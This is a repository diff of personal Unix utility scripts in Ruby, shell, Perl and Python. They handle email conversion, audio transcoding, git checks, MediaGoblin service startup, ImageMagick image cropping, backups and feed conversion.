if timezone==nil
return time.strftime("%a %b %d %H:%M:%S %Y")
else
if $switches["zoneYearOrder"]
return time.strftime("%a %b %d %H:%M:%S "+timezone.to_s+" %Y")
else
return time.strftime("%a %b %d %H:%M:%S %Y "+timezone.to_s)
end
end
end
# Extracts all switches from the command line and returns
# a hashmap with valid switch names as keys and booleans as values
# Moves real params to the beggining of the ARGV array
def extractSwitches()
switches = Hash.new(false) # All switches (values) default to false
i=0
while (ARGV[i]=~ /^-/) # while arguments are switches
if ARGV[i]=="-c"
switches["removeCRs"] = true
puts "\nWill fix lines ending with a CR"
elsif ARGV[i]=="-l"
switches["removeLFs"] = true
puts "\nWill fix lines beggining with a LF"
elsif ARGV[i]=="-s"
switches["noStandardFromLine"] = true
puts "\nWill use From and Date from mail headers in From_ line"
elsif ARGV[i]=="-yz"
switches["zoneYearOrder"] = true
puts "\nTimezone will be placed before the year in From_ line"
else
puts "\nUnknown switch: "+ARGV[i]+". Ignoring."
end
i = i+1
end
# Move real arguments to the beggining of the array
ARGV[0] = ARGV[i]
ARGV[1] = ARGV[i+1]
return switches
end
#===============#
# Main #
#===============#
$switches = extractSwitches()
# Extract specified directory with emls and the target archive (if any)
emlDir = "." # default if not specified
emlDir = ARGV[0] if ARGV[0]!=nil
mboxArchive = emlDir+"/archive.mbox" # default if not specified
mboxArchive = ARGV[1] if ARGV[1] != nil
# Show specified settings
puts "\nSpecified dir : "+emlDir
puts "Specified file: "+mboxArchive+"\n"
# Check that the dir exists
if FileTest.directory?(emlDir)
Dir.chdir(emlDir)
else
puts "\n["+emlDir+"] is not a directory (might not exist). Please specify a valid dir"
exit(0)
end
# Check if destination file exists. If yes allow user to select an option.
canceled = false
if FileTest.exist?(mboxArchive)
print "\nFile ["+mboxArchive+"] exists! Please select: [A]ppend [O]verwrite [C]ancel (default) "
sel = STDIN.gets.chomp
if sel == 'A' or sel == 'a'
aFile = File.new(mboxArchive, "a");
elsif sel == 'O' or sel == 'o'
aFile = File.new(mboxArchive, "w");
else
canceled = true
end
else
# File doesn't exist, open for writing
aFile = File.new(mboxArchive, "w");
end
if not canceled
puts
files = Dir["*.eml"]
if files.size == 0
puts "No *.eml files in this directory. mbox file not created."
aFile.close
File.delete(mboxArchive)
exit(0)
end
# For each .eml file in the specified directory do the following
files.each() do |x|
puts "Processing file: "+x
thisFile = FileInMemory.new()
File.open(x).each {|item| thisFile.addLine(item) }
lines = thisFile.getProcessedLines
if lines == nil
puts "WARN: File ["+x+"] doesn't seem to have a regular From: line. Not included in mbox"
else
lines.each {|line| aFile.puts line}
end
end
aFile.close
end

21
extract_ear.sh Executable file
View File

@ -0,0 +1,21 @@
#!/bin/sh
EARFILE=$1
EXTR_DIR=$2
# tester fichier et repertoire
# extraire le fichier donné dans le repertoire
unzip $EARFILE -d $EXTR_DIR
# extraire chaque fichier jar, war, sar dans le repertoire temporaire
for ar_file in `ls $EXTR_DIR/*.?ar`
do
TMP_DIR=$EXTR_DIR/.tmp
mkdir -p $TMP_DIR
# suppromer le jar/war/sar du repertoire d'extraction, le remplacer par le repertoire des fichiers extraits
unzip $ar_file -d $TMP_DIR
rm -f $ar_file
mv $TMP_DIR $ar_file
done

13
fix_wicd.sh Executable file
View File

@ -0,0 +1,13 @@
#!/bin/sh
# corrige un bug de wicd, un ligne contenant [] apparait dans le fichier de
# conf et fait planter le demon
# à executer avec les droits root
# Fichier à corriger
CONF_FILE=/etc/wicd/wired-settings.conf
# Backup
cp $CONF_FILE $CONF_FILE.bak
# supprimer les lignes contenant []
sed '/\[\]/d' $CONF_FILE.bak > $CONF_FILE
/etc/init.d/wicd restart

62
flac2mp3.sh Executable file
View File

@ -0,0 +1,62 @@
#!/bin/bash
# from http://www.linuxtutorialblog.com/post/solution-converting-flac-to-mp3
OUT_DIR=${OUT_DIR:="$HOME/tmp/mp3"}
[ ! -d ${OUT_DIR} ] && mkdir -p ${OUT_DIR}
# modify the lame options to your
# preference
lame_opts=" --vbr-new -V 2 -B 256 "
for x in "${@}"
do
FLAC=${x}
MP3=`basename "${FLAC%.flac}.mp3"`
[ -r "$FLAC" ] || { echo can not read file \"$FLAC\" >&1 ; exit 1 ; } ;
TITLE=""
TRACKNUMBER=""
GENRE=""
DATE=""
COMMENT=""
ARTIST=""
ALBUM=""
Title=""
Tracknumber=""
Genre=""
Date=""
Comment=""
Artist=""
Album=""
metaflac --export-tags-to=- "$FLAC" | sed 's/=\(.*\)/="\1"/' > $OUT_DIR/tmp.tmp
. $OUT_DIR/tmp.tmp
rm $OUT_DIR/tmp.tmp
[ -z "$TITLE" ] && TITLE="$Title"
[ -z "$TRACKNUMBER" ] && TRACKNUMBER="$Tracknumber"
[ -z "$GENRE" ] && GENRE="$Genre"
[ -z "$DATE" ] && DATE="$Date"
[ -z "$COMMENT" ] && COMMENT="$Comment"
[ -z "$ARTIST" ] && ARTIST="$Artist"
[ -z "$ALBUM" ] && ALBUM="$Album"
echo "Converting ${FLAC} to MP3 format"
OUTFILE="${OUT_DIR}/$ARTIST/${DATE}_$ALBUM/$MP3"
mkdir -p "${OUT_DIR}/$ARTIST/${DATE}_$ALBUM"
flac -c -d "$FLAC" | lame ${lame_opts} - "$OUTFILE"
id3v2 \
-a "$ARTIST" \
-A "$ALBUM" \
-t "$TITLE" \
-c "$COMMENT" \
-g "$GENRE" \
-y "$DATE" \
-T "$TRACKNUMBER" \
"$OUTFILE"
done

34
gitremotediff.sh Executable file
View File

@ -0,0 +1,34 @@
#!/bin/bash
# find diff between git working copy and remote
# directory containing working copies
DIR_ROOT=$1
if [[ ! $DIR_ROOT ]] || [[ ! -d $DIR_ROOT ]]; then
echo "Usage: $0 root_dir"
exit 1
fi
# remember work dir
ORIG_DIR=$PWD
# search working copies
for GITDIR in $( find $DIR_ROOT -name .git -type d ); do
WORKCOPY=${GITDIR%/.git}
cd $WORKCOPY
# tester s'il y a un repo remote
if [ -n "$( git remote)" ]; then
# fetch remote
git fetch -q
# fichiers differents
GITREMOTEDIFF=$( git diff --name-status remotes/origin/master )
if [ -n "$GITREMOTEDIFF" ];then
echo "$WORKCOPY not synchronised with remote"
echo "$GITREMOTEDIFF"
fi
fi
# restore work dir
cd $ORIG_DIR
done

29
gitworkreminder.sh Executable file
View File

@ -0,0 +1,29 @@
#!/bin/bash
# find untracked files in git working copies (under the specified directory)
# directory containing working copies
DIR_ROOT=$1
if [[ ! $DIR_ROOT ]] || [[ ! -d $DIR_ROOT ]]; then
echo "Usage: $0 root_dir"
exit 1
fi
# remember work dir
ORIG_DIR=$PWD
# search working copies
for GITDIR in $( find $DIR_ROOT -name .git -type d ); do
WORKCOPY=${GITDIR%/.git}
cd $WORKCOPY
GITSTATUS=$( git status --porcelain )
if [ -n "$GITSTATUS" ]; then
echo "Untracked files in $WORKCOPY"
echo "$GITSTATUS"
echo
fi
# restore work dir
cd $ORIG_DIR
done

5
gmail_fingerprints.sh Executable file
View File

@ -0,0 +1,5 @@
#!/bin/sh
# fingerprint certificat gmail (pour fetchmail)
openssl s_client -connect imap.gmail.com:993 -showcerts < /dev/null | openssl x509 -fingerprint -md5 -text | grep Fingerprint | awk -F= '{print $2}'

10
is_sync.sh Executable file
View File

@ -0,0 +1,10 @@
#!/bin/bash
LOG_FILE=tmp/is_sync.log
# lancement en background, lecture du dernier appel
if [ -s $LOG_FILE ]; then
echo "<click>zenity --text-info --filename=$LOG_FILE --title Synchronisation</click>"
echo "<img>/usr/share/icons/gnome/scalable/emblems/emblem-important-symbolic.svg</img>"
else
echo "<img>/usr/share/icons/gnome/scalable/emblems/emblem-default-symbolic.svg</img>"
fi

45
mgceleryd Normal file
View File

@ -0,0 +1,45 @@
#!/bin/sh
# PROVIDE: mgceleryd
# REQUIRE: LOGIN cleanvar
# KEYWORD: shutdown
. /etc/rc.subr
name="mgceleryd"
rcvar="mgceleryd_enable"
load_rc_config $name
: ${mgceleryd_enable:="NO"}
: ${mgceleryd_path:="/usr/local/www/photos.meutel.net/mediagoblin"}
: ${mgceleryd_user:="www"}
: ${mgceleryd_mgconfig:="$mgceleryd_path/mediagoblin_local.ini"}
: ${mgceleryd_config_module:="mediagoblin.init.celery.from_celery"}
: ${mgceleryd_logdir:="/var/log/mediagoblin"}
: ${mgceleryd_eggcache:="/usr/local/www/.python-eggs"}
pidfile="/var/run/${name}.pid"
required_files="$mgceleryd_mgconfig"
required_dirs="$mgceleryd_path $mgceleryd_path/bin $mgceleryd_logdir"
start_precmd="${name}_prestart"
mgceleryd_chdir=$mgceleryd_path
command="$mgceleryd_path/bin/celery"
command_args=" > $mgceleryd_logdir/${name}_start.log 2>&1 &"
command_interpreter="$mgceleryd_path/bin/python"
mgceleryd_flags=" worker --pidfile $pidfile -f ${mgceleryd_logdir}/${name}.log $mgceleryd_flags"
mgceleryd_prestart()
{
touch $pidfile
chown $mgceleryd_user $pidfile
MEDIAGOBLIN_CONFIG=$mgceleryd_mgconfig
export MEDIAGOBLIN_CONFIG
CELERY_CONFIG_MODULE=$mgceleryd_config_module
export CELERY_CONFIG_MODULE
PYTHON_EGG_CACHE="$mgceleryd_eggcache"
export PYTHON_EGG_CACHE
}
run_rc_command "$1"

47
mgpaster Normal file
View File

@ -0,0 +1,47 @@
#!/bin/sh
# PROVIDE: mgpaster
# REQUIRE: LOGIN cleanvar
# KEYWORD: shutdown
. /etc/rc.subr
name="mgpaster"
rcvar="mgpaster_enable"
load_rc_config $name
: ${mgpaster_enable:="NO"}
: ${mgpaster_path:="/usr/local/www/photos.meutel.net/mediagoblin"}
: ${mgpaster_user:="www"}
: ${mgpaster_pasteini:="paste_local.ini"}
: ${mgpaster_logdir:="/var/log/mediagoblin"}
: ${mgpaster_eggcache:="/usr/local/www/.python-eggs"}
: ${mgpaster_host:="10.42.0.90"}
: ${mgpaster_port:="26543"}
: ${mgpaster_celery_eager:="false"}
pidfile="/var/run/${name}.pid"
required_files="$mgpaster_path/$mgpaster_pasteini"
required_dirs="$mgpaster_path $mgpaster_path/bin $mgpaster_logdir"
start_precmd="${name}_prestart"
mgpaster_chdir=$mgpaster_path
command="$mgpaster_path/bin/paster"
command_interpreter="$mgpaster_path/bin/python"
command_args=" > $mgpaster_logdir/${name}_start.log 2>&1"
mgpaster_flags=" serve $mgpaster_path/$mgpaster_pasteini --server-name=fcgi \
fcgi_host=$mgpaster_host fcgi_port=$mgpaster_port \
--pid-file $pidfile --log-file ${mgpaster_logdir}/${name}.log --daemon $mgpaster_flags"
mgpaster_prestart()
{
touch $pidfile
chown $mgpaster_user $pidfile
CELERY_ALWAYS_EAGER=$mgpaster_celery_eager
export CELERY_ALWAYS_EAGER
PYTHON_EGG_CACHE="$mgpaster_eggcache"
export PYTHON_EGG_CACHE
}
run_rc_command "$1"

402
multicrop Executable file
View File

@ -0,0 +1,402 @@
#!/bin/bash
#
# Revised by Fred Weinhaus ...................... revised 8/24/2010
# Revised by Anthony Thyssen to add -b option ... revised 8/24/2010
# Developed by Fred Weinhaus 1/30/2010 .......... revised 7/7/2010
#
# USAGE: multicrop [-c coords] [-b bcolor] [-f fuzzval] [-g grid] [-u unrotate] [-m mask] infile outfile
# USAGE: multicrop [-h or -help]
#
# OPTIONS:
#
# -c coords pixel coordinate to extract background color;
# may be expressed as gravity value (NorthWest, etc)
# or as "x,y" value; default is NorthWest=(0,0)
# -b bcolor background color to use instead of option -c;
# any valid IM color; default is to use option -c
# -f fuzzval fuzz value for separating background color;
# expressed as (integer) percent 0 to 100;
# default=0 (uniform color)
# -g grid grid spacing in both x and y as percent of
# image width and height; used to locate images;
# integer>0; default=10;
# -u unrotate unrotate method; choices are 1 for -deskew,
# 2 for unrotate script and 3 for no unrotate;
# default=1
# -m mask mask presentation method; choices are view,
# save (to file) or output mask only; default
# is none of the above, just output the images
#
###
#
# NAME: MULTICROP
#
# PURPOSE: To crop and unrotate multiple images from a scanned image.
#
# DESCRIPTION: MULTICROP crops and unrotates multiple images from a scanned image.
# The images must be well separate so that background color shows between them.
# The process uses a floofill technique based upon a seed coordinate and a fuzz
# value to separate the individual images from the background of the scan.
# The correct choice of fuzz factor is very important. If too small, the images
# will not be separate. If too larger, parts of the outer area of the image
# containing similar colors will be lost and the image may be separated into
# multiple parts. There are two unrotate methods. The first uses the IM deskew
# function, but is limited to 5 degrees of rotate or less. The second uses my
# unrotate script. It allows much larger rotations, but will be slower. If
# using the second method, my unrotate script must be downloaded and installed.
#
# IMPORTANT: The images in the scanned file must be well separated in x and y
# so that their bounding boxes do not overlap. This is especially important
# if the images have a significant rotation.
#
# The output images will be named from the specified outfile and -0, -1,
# etc, will be appended before the .suffix.
#
# Arguments:
#
# -c coords ... COORDS is any location within the background (non-image) area
# for the algorithm to find the background color. It may be specified in terms
# of gravity parameters (NorthWest, North, NorthEast, East, SouthEast, South,
# SouthWest or West) or as a pixel coordinate "x,y". The default is the
# upper left corner = NorthWest = "0,0".
#
# -b bcolor ... BCOLOR is the background color to use for flood fill instead
# of extracting this color from the image. This is useful when an image has
# no borders with sub-images hard against the edges. Any valid IM color is
# allowed. The default is to use option -c.
#
# -f fuzzval ... FUZZVAL is the fuzz amount specified as an integer percent
# value between 0 to 100 (without the % sign). # The correct choice of fuzz
# factor is very important. If too small, the images will not be separate.
# If too larger, parts of the outer area of the image containing similar
# colors will be lost and the image may be separated into multiple parts.
# Typical values are probably between 5 and 20 percent. The default=10
#
# -g grid ... GRID is the grid spacing for testing points in the input image
# to see if they are background or image. The grid value is specified as an
# integer percent greater than 0 and less than 100 of the width and height
# of the input image. The default=10.
#
# -u unrotate ... UNROTATE is the unrotation method. Choices are: 1, 2 or 3.
# The default is unrotate=1, which is fast and uses the IM -deskew function,
# but is limited to images that are rotated no more than 5 degrees in the scan.
# Option unrotate=2 uses my unrotate script. It can handle larger rotations,
# but is slower. If using the latter method, my unrotate script must be
# downloaded and also installed so that it is available for this script to use.
# Option unrotate=3 makes no attempt to unrotate the images.
#
# -m mask ... MASK provides several options for reviewing the initial mask that
# is generated by the fuzz value. The choices are: view (display to X11 window),
# save (to disk) along with the images, or output (without processing the images).
# The default is to simply process the images without showing or saving the mask.
# If using the view mode, then processing will stop until the image is closed.
# But this allows you to then kill the script if the mask is not appropriate.
# A good approach is to use the output mode repeatedly with various fuzzvals
# until a reasonable mask is created. Note that the mask must separate the
# images, but the background can "eat" a little into the images so long as no
# full edge is lost or the images is split into multiple parts.
#
# NOTE: If using unrotate method 2, then my script, unrotate, is required
# as well.
#
# CAVEAT: No guarantee that this script will work on all platforms,
# nor that trapping of inconsistent parameters is complete and
# foolproof. Use At Your Own Risk.
#
######
#
# set default values
coords="0,0" # initial coord for finding background color
bcolor="" # initial background color
fuzzval=10 # fuzz amount in percent for making background transparent
grid=10 # grid spacing in percent image
mask="" # view, save, output
unrotate=1 # 1=deskew 2=unrotate
# set directory for temporary files
dir="." # suggestions are dir="." or dir="/tmp"
# set up functions to report Usage and Usage with Description
PROGNAME=`type $0 | awk '{print $3}'` # search for executable on path
PROGDIR=`dirname $PROGNAME` # extract directory of program
PROGNAME=`basename $PROGNAME` # base name of program
usage1()
{
echo >&2 ""
echo >&2 "$PROGNAME:" "$@"
sed >&2 -n '/^###/q; /^#/!q; s/^#//; s/^ //; 4,$p' "$PROGDIR/$PROGNAME"
}
usage2()
{
echo >&2 ""
echo >&2 "$PROGNAME:" "$@"
sed >&2 -n '/^######/q; /^#/!q; s/^#*//; s/^ //; 4,$p' "$PROGDIR/$PROGNAME"
}
# function to report error messages
errMsg()
{
echo ""
echo $1
echo ""
usage1
exit 1
}
# function to test for minus at start of value of second part of option 1 or 2
checkMinus()
{
test=`echo "$1" | grep -c '^-.*$'` # returns 1 if match; 0 otherwise
[ $test -eq 1 ] && errMsg "$errorMsg"
}
# test for correct number of arguments and get values
if [ $# -eq 0 ]
then
# help information
echo ""
usage2
exit 0
elif [ $# -gt 14 ]
then
errMsg "--- TOO MANY ARGUMENTS WERE PROVIDED ---"
else
while [ $# -gt 0 ]
do
# get parameters
case "$1" in
-h|-help) # help information
echo ""
usage2
;;
-f) # fuzzval
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID FUZZVAL SPECIFICATION ---"
checkMinus "$1"
fuzzval=`expr "$1" : '\([0-9]*\)'`
[ "$fuzzval" = "" ] && errMsg "--- FUZZVAL=$fuzzval MUST BE A NON-NEGATIVE INTEGER VALUE (with no sign) ---"
fuzzvaltestA=`echo "$fuzzval < 0" | bc`
fuzzvaltestB=`echo "$fuzzval > 100" | bc`
[ $fuzzvaltestA -eq 1 -a $fuzzvaltestB -eq 1 ] && errMsg "--- FUZZVAL=$fuzzval MUST BE A NON-NEGATIVE INTEGER VALUE BETWEEN 0 AND 100 ---"
;;
-c) # coords
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID COORDS SPECIFICATION ---"
checkMinus "$1"
coords=$1
# further testing done later
;;
-b) # coords
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID COORDS SPECIFICATION ---"
checkMinus "$1"
bcolor=$1
;;
-g) # grid
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID GRID SPECIFICATION ---"
checkMinus "$1"
grid=`expr "$1" : '\([0-9]*\)'`
[ "$grid" = "" ] && errMsg "--- GRID=$grid MUST BE A NON-NEGATIVE INTEGER VALUE (with no sign) ---"
gridtestA=`echo "$grid <= 0" | bc`
gridtestB=`echo "$grid >= 100" | bc`
[ $gridtestA -eq 1 -a $gridtestB -eq 1 ] && errMsg "--- GRID=$grid MUST BE A NON-NEGATIVE INTEGER VALUE LARGER THAN 0 AND SMALLER THAN 100 ---"
;;
-u) # unrotate
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID UNROTATE SPECIFICATION ---"
checkMinus "$1"
unrotate=`expr "$1" : '\([0-9]\)'`
[ $unrotate -lt 1 -a $unrotate -gt 3 ] && errMsg "--- UNROTATE=$unrotate MUST BE EITHER 1, 2 OR 3 ---"
;;
-m) # mask
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID MASK SPECIFICATION ---"
checkMinus "$1"
mask=`echo "$1" | tr "[:upper:]" "[:lower:]"`
[ "$mask" != "view" -a "$mask" != "save" -a "$mask" != "output" ] && errMsg "--- MASK=$mask MUST BE EITHER VIEW, SAVE OR OUTPUT ---"
;;
-) # STDIN and end of arguments
break
;;
-*) # any other - argument
errMsg "--- UNKNOWN OPTION ---"
;;
*) # end of arguments
break
;;
esac
shift # next option
done
# get infile and outfile
infile=$1
outfile=$2
fi
# test if both bcolor and coords specified at the same time
if [ "X$bcolor" != "X" -a "X$coods" != "X" ]; then
errMsg "--- BACKGROUND COLOR AND COODINATES CAN NOT BE USED TOGETHER ---"
fi
# test that infile provided
[ "$infile" = "" ] && errMsg "NO INPUT FILE SPECIFIED"
# test that outfile provided
[ "$outfile" = "" ] && errMsg "NO OUTPUT FILE SPECIFIED"
# set up temp file
tmpA1="$dir/multicrop_1_$$.mpc"
tmpB1="$dir/multicrop_1_$$.cache"
tmpA2="$dir/multicrop_2_$$.mpc"
tmpB2="$dir/multicrop_2_$$.cache"
tmpA3="$dir/multicrop_3_$$.mpc"
tmpB3="$dir/multicrop_3_$$.cache"
tmpA4="$dir/multicrop_4_$$.mpc"
tmpB4="$dir/multicrop_4_$$.cache"
tmpA5="$dir/multicrop_5_$$.mpc"
tmpB5="$dir/multicrop_5_$$.cache"
trap "rm -f $tmpA1 $tmpB1 $tmpA2 $tmpB2 $tmpA3 $tmpB3 $tmpA4 $tmpB4 $tmpA5 $tmpB5; exit 0" 0
trap "rm -f $tmpA1 $tmpB1 $tmpA2 $tmpB2 $tmpA3 $tmpB3 $tmpA4 $tmpB4 $tmpA5 $tmpB5; exit 1" 1 2 3 15
# read the input image into the temp files and test validity.
convert -quiet -regard-warnings "$infile" +repage "$tmpA1" ||
errMsg "--- FILE $infile1 DOES NOT EXIST OR IS NOT AN ORDINARY FILE, NOT READABLE OR HAS ZERO SIZE ---"
# get output filename and suffix
outnameArr=(`echo "$outfile" | sed -n 's/^\(.*\)[.]\([^.]*\)$/\1 \2/p'`)
outname="${outnameArr[0]}"
suffix="${outnameArr[1]}"
#echo "outname=$outname"
#echo "suffix=$suffix"
# get image width and height
width=`identify -ping -format "%w" $tmpA1`
height=`identify -ping -format "%h" $tmpA1`
# get color at user specified location
if [ "X$bgcolor" != "X" ]; then
coords="0,0"
else
widthm1=`convert xc: -format "%[fx:$width-1]" info:`
heightm1=`convert xc: -format "%[fx:$height-1]" info:`
midwidth=`convert xc: -format "%[fx:round(($width-1))/2]" info:`
midheight=`convert xc: -format "%[fx:round(($height-1))/2]" info:`
coords=`echo "$coords" | tr "[:upper:]" "[:lower:]"`
case "$coords" in
''|nw|northwest) coords="0,0" ;;
n|north) coords="$midwidth,0" ;;
ne|northeast) coords="$widthm1,0" ;;
e|east) coords="$widthm1,$midheight" ;;
se|southeast) coords="$widthm1,$heightm1" ;;
s|south) coords="$midwidth,$heightm1" ;;
sw|southwest) coords="0,$heightm1" ;;
w|west) coords="0,$midheight" ;;
[0-9]*,[0-9]*) coords=$coords ;;
*) errMsg "--- INVALID COORDS ---" ;;
esac
bgcolor=`convert $tmpA1 -format "%[pixel:u.p{$coords}]" info:`
fi
#echo "bgcolor=$bgcolor"
# get grid spacing
wg=`convert xc: -format "%[fx:round($grid*$width/100)]" info:`
hg=`convert xc: -format "%[fx:round($grid*$height/100)]" info:`
num=`convert xc: -format "%[fx:round(100/$grid) - 2]" info:`
#echo "width=$width; height=$height; wg=$wg; hg=$hg; num=$num"
# add a border, and flood fill from all edges inward
convert $tmpA1 -fuzz ${fuzzval}% -fill none \
-bordercolor $bgcolor -border 1x1 \
-draw "matte $coords floodfill" \
-shave 1x1 -fill red +opaque none \
$tmpA2
if [ "$mask" = "view" ]; then
display $tmpA2
elif [ "$mask" = "save" ]; then
convert $tmpA2 ${outname}_mask.gif
elif [ "$mask" = "output" ]; then
convert $tmpA2 ${outname}_mask.gif
exit 0
fi
# set up for unrotate 1 or 3
if [ $unrotate -eq 1 ]; then
derotate="-deskew 40%"
elif [ $unrotate -eq 3 ]; then
derotate=""
fi
echo ""
# loop over grid and floodfill and trim to get individual mask for each image
k=0
y=0
for ((j=0;j<=$num;j++))
do
x=0
y=$(($y + $hg))
for ((i=0;i<=$num;i++))
do
x=$(($x + $wg))
# test if found color other than "none" (i.e. red)
testcolor=`convert $tmpA2 -channel rgba -alpha on -format \
"%[fx:u.p{$x,$y}=="none"?0:1]" info:`
# echo "$x $y $testcolor"
if [ $testcolor -eq 1 ]; then
echo "Processing Image $k"
# Take red and none mask.
# Floodfill the local red region with white.
convert $tmpA2 -channel rgba -alpha on -fill "white" \
-draw "color $x,$y floodfill" $tmpA3
# Fill anything not white with transparency and
# turn transparency off so black.
# Then clone and trim to bounds of white.
# Then fill any black with white.
# Then flatten back onto white and black image so that any white
# areas eaten away are filled with white.
# Note flatten uses the virtual canvas left by -trim so that it
# goes back into the right location.
convert \( $tmpA3 -channel rgba -alpha on \
-fill none +opaque white -alpha off \) \
\( +clone -trim -fill white -opaque black -write $tmpA5 \) \
-flatten $tmpA4
# Print size and page geometry
identify -ping -format " Size: %wx%h\n Page Geometry: %g" $tmpA5
# Composite the black and white mask onto the original scan.
# Then trim and deskew/unrotate to make the output.
if [ $unrotate -eq 1 -o $unrotate -eq 3 ]; then
convert $tmpA1 $tmpA4 -compose multiply -composite \
-fuzz ${fuzzval}% -trim -background "$bgcolor" $derotate \
-compose over -bordercolor "$bgcolor" -border 2 -trim +repage \
${outname}-${k}.${suffix}
elif [ $unrotate -eq 2 ]; then
convert $tmpA1 $tmpA4 -compose multiply -composite \
-fuzz ${fuzzval}% -trim miff:- | \
unrotate -f ${fuzzval}% - ${outname}-${k}.${suffix}
fi
# Fill the selected photo area in the red/none mask with none
# for use with next coordinate so that it does not find it again.
convert $tmpA3 -channel rgba -alpha on -fill none -opaque white $tmpA2
k=$(($k + 1))
fi
done
done
echo ""
exit 0

3
mysql_backup.sh Normal file
View File

@ -0,0 +1,3 @@
#!/bin/bash
# backup mysql base gallery3
mysqldump -Q --add-drop-table gallery3 > ~/mysql/mysql_gallery3_$(date +%Y%m%d).sql

BIN
newmail Executable file

Binary file not shown.

8
newmail_ol.sh Executable file
View File

@ -0,0 +1,8 @@
#!/bin/bash
# source newmail: http://code.burningsoda.com/newmail
# https://github.com/roblillack/newmail/
# print Maildir folders containing unread mails with count, on one line
newmail .mail 2>/dev/null | grep -v archives | awk '{print $2"("$1")"}' | tr '\n' ' '
newmail .mail/RSS 2>/dev/null | grep -v archives | awk '{print "RSS/"$2"("$1")"}' | tr '\n' ' '

81
opml2feed.pl Executable file
View File

@ -0,0 +1,81 @@
#!/usr/bin/perl -w
# ########################################################################
# This program converts the the output from a OPML file to the format
# used by feed2imap. You could for example export a opml file from
# Google reader and convert it to a .feedrc file.
#
# #########################################################################
# This file is part of opml2feed
#
# opml2feed is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# opml2feed is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with opml2feed. If not, see <http://www.gnu.org/licenses/>.
# http://www.gnu.org/licenses/agpl-3.0.html
# #########################################################################
use strict;
use XML::Twig;
use Data::Dumper;
use URI::Escape;
binmode STDOUT, ":utf8";
my $imap_username = 'rss@example.com';
my $imap_password = 'myultracoolpassword';
my $imap_server = 'imap.example.com';
my $imap_base = 'INBOX.Feeds';
#my $maildir_base = '/home/meutel/.mail/feeds';
my $maildir_base = '/home/meutel/tmp/feeds';
# You shouldn't need to change anything after here - If you do please contribute back.
$imap_username = uri_escape_utf8( $imap_username );
$imap_password = uri_escape_utf8( $imap_password );
my $title_parent = "";
my $opmlfile= $ARGV[0] || 'google-reader-subscriptions.xml';
my $feed2imapfile= $ARGV[1] || '.feed2imaprc';
die "ERROR: $opmlfile is missing" unless -e $opmlfile;
die "ERROR: $feed2imapfile already exists" if -e $feed2imapfile;
open FH, ">>:utf8", $feed2imapfile or die "can't open '$feed2imapfile': $!";
print FH "feeds:\n";
my $twig= new XML::Twig(
twig_handlers =>
{ outline => \&outline }
);
$twig->parsefile( $opmlfile);
close FH;
sub outline
{ my( $twig, $outline)= @_;
$title_parent = $outline->parent->att( 'text') || "#" ;
if ( $title_parent !~ /^\#/ )
{
my $title = $outline->att( 'text');
$title =~ s/[^a-zA-Z0-9_ .]*//g;
$title =~ s/ {1,}/ /g;
$title_parent =~ s/[^a-zA-Z0-9_ .]*//g;
$title_parent =~ s/ /_/g;
my $xmlUrl = $outline->att( 'xmlUrl');
print FH " - name: ${title}\n";
print FH " url: ${xmlUrl}\n";
print FH " target: maildir://${maildir_base}/${title_parent}\n";
#print FH " target: imap://${imap_username}:${imap_password}\@${imap_server}/${imap_base}.${title_parent}\n";
print FH " include-images: true\n\n";
}
}

4
pass_ssha_salt.py Executable file
View File

@ -0,0 +1,4 @@
#!/usr/bin/env python
import base64, getpass, hashlib, os
salt = os.urandom(8) # edit the length as you see fit
print '{SSHA}' + base64.b64encode(hashlib.sha1(getpass.getpass() + salt).digest() + salt)

58
pluzz Executable file
View File

@ -0,0 +1,58 @@
#!/bin/bash
# Script pour utiliser pluzz.fr
# v0.2 (11 juillet 2010)
if [ $# != 2 ]
then
printf "Syntaxe: $0 [url|play|record] http://www.pluzz.fr/...\n" >&2
exit 1
fi
command="$1"
url="$2"
if [ "$command" != 'url' -a "$command" != 'play' -a "$command" != 'record' ]
then
printf "Command must be 'url', 'play' or 'record', not '$command'\n" >&2
exit 2
fi
video_page_url=$(wget -qO- "$url" | grep -o 'http://info.francetelevisions.fr/?id-video=[^"]\+')
stream_url_part2=$(wget -qO- "$video_page_url" | grep urls-url-video | sed 's/.*content="\(.*\)".*/\1/')
ext=${stream_url_part2##*.}
if [ "$ext" = 'wmv' ]
then
stream_url_part1='mms://a988.v101995.c10199.e.vm.akamaistream.net/7/988/10199/3f97c7e6/ftvigrp.download.akamai.com/10199/cappuccino/production/publication'
elif [ "$ext" = 'mp4' ]
then
stream_url_part1='rtmp://videozones-rtmp.francetv.fr/ondemand/mp4:cappuccino/publication'
else
printf "Extension not managed : '$ext'\n" >&2
exit 3
fi
stream_url="$stream_url_part1/$stream_url_part2"
if [ "$command" = "url" ]
then
printf "$stream_url\n"
elif [ "$command" = "play" ]
then
if [ "$ext" = 'wmv' ]
then
vlc "$stream_url"
else
flvstreamer -r "$stream_url" | vlc -
fi
elif [ "$command" = "record" ]
then
output_file=${stream_url##*/}
printf "Recording to $output_file...\n"
if [ "$ext" = 'wmv' ]
then
#vlc "$stream_url" ":sout=#std{access=file,mux=asf,dst=$output_file}"
mplayer $stream_url -dumpstream -dumpfile $output_file
else
flvstreamer -r "$stream_url" -o "$output_file"
fi
fi

5
poudriere_bulk.sh Executable file
View File

@ -0,0 +1,5 @@
#!/bin/sh
# poudriere update ports, rebuild 9.2
/usr/local/bin/poudriere ports -u
/usr/local/bin/poudriere bulk -f /root/build.list -j 92amd64 &

3
remove_bom Executable file
View File

@ -0,0 +1,3 @@
#!/bin/bash
awk '{if(NR==1)sub(/^\xef\xbb\xbf/,"");print}' $1

14
rword.sh Executable file
View File

@ -0,0 +1,14 @@
#!/usr/bin/env bash
WORDFILE="/usr/share/dict/words"
NUMWORDS=${1:-5}
#Number of lines in $WORDFILE
tL=`awk 'NF!=0 {++c} END {print c}' $WORDFILE`
for i in `seq $NUMWORDS`
do
